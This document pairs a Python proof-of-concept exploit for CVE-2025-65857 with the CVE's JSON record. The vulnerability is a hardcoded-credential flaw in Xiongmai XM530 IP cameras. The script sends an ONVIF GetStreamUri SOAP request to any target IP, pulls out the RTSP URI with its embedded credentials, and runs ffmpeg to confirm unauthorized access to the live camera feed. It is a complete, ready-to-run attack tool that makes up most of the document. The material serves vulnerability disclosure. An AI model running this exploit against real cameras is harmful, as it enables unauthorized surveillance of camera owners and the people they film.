CVE-2025-65857

#!/usr/bin/env python3 """ CVE-2025-65857 PoC - Xiongmai XM530 IP Camera GetStreamUri Hardcoded Credentials This PoC demonstrates how to extract RTSP URI with hardcoded credentials from affected cameras. """ import requests import sys import re from urllib.parse import urljoin def extract_rtsp_uri(target_ip, port=80): """ Send ONVIF GetStreamUri request to extract RTSP URI with hardcoded credentials. Args: target_ip: Target camera IP address port: ONVIF service port (default: 80) Returns: RTSP URI containing hardcoded credentials """ # ONVIF GetStreamUri SOAP request soap_request = """<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tns="http://www.onvif.org/ver10/device/wsdl" xmlns:trt="http://www.onvif.org/ver10/media/wsdl"> <soap:Header/> <soap:Body> <trt:GetStreamUri> <trt:StreamSetup> <tt:Stream xmlns:tt="http://www.onvif.org/ver10/schema">RTP-Unicast</tt:Stream> <tt:Transport xmlns:tt="http://www.onvif.org/ver10/schema"> <tt:Protocol>RTSP</tt:Protocol> </tt:Transport> </trt:StreamSetup> <trt:ProfileToken>Profile_1</trt:ProfileToken> </trt:GetStreamUri> </soap:Body> </soap:Envelope>""" headers = { 'Content-Type': 'application/soap+xml; charset=utf-8', 'SOAPAction': '"http://www.onvif.org/ver10/media/wsdl/GetStreamUri"' } url = f"http://{target_ip}:{port}/onvif/media_service" try: print(f"[*] Sending ONVIF GetStreamUri request to {url}") response = requests.post(url, data=soap_request, headers=headers, timeout=10) if response.status_code == 200: # Extract RTSP URI from response rtsp_match = re.search(r'rtsp://[^<]+', response.text) if rtsp_match: rtsp_uri = rtsp_match.group(0) print(f"[+] SUCCESS: Found RTSP URI with credentials: {rtsp_uri}") return rtsp_uri else: print("[-] No RTSP URI found in response") return None else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None def verify_rtsp_access(rtsp_uri): """ Verify RTSP stream access using FFmpeg. This step demonstrates unauthorized video access. """ import subprocess print(f"[*] Attempting to access video stream: {rtsp_uri}") print("[*] This would allow unauthorized viewing of camera feed") # Example FFmpeg command to test stream access # ffmpeg -i "rtsp_uri" -t 1 -f null - cmd = ['ffmpeg', '-i', rtsp_uri, '-t', '1', '-f', 'null', '-'] try: result = subprocess.run(cmd, capture_output=True, timeout=15) if result.returncode == 0: print("[+] Video stream accessible - vulnerability confirmed") else: print("[-] Stream access failed") except Exception as e: print(f"[*] Stream test skipped: {e}") def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") print(f"Example: python {sys.argv[0]} 192.168.1.100 80") sys.exit(1) target_ip = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print(f"[*] CVE-2025-65857 PoC - Xiongmai XM530 Hardcoded Credentials") print(f"[*] Target: {target_ip}:{port}") print() rtsp_uri = extract_rtsp_uri(target_ip, port) if rtsp_uri: print() verify_rtsp_access(rtsp_uri) print() print("[!] VULNERABLE: Camera exposes RTSP URI with hardcoded credentials") print("[!] Immediate remediation recommended") else: print("[-] Target may not be vulnerable or is unreachable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-65857", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:08.530", "lastModified": "2026-05-07T19:15:59.840", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06. The GetStreamUri exposes RTSP URIs containing hardcoded credentials enabling direct unauthorized video stream access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:*", "matchCriteriaId": "6DFBF9B8-CA55-459F-95F9-3606B52D92B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D72FD0CF-CE0C-4466-8F42-099FA0E8D7D5"}]}]}], "references": [{"url": "http://hangzhou.com", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "http://ip.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://luismirandaacebedo.github.io/CVE-2025-65857/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.xiongmaitech.com/en/index.php/service/notice_info/51/4", "source": "[email protected]"}]}}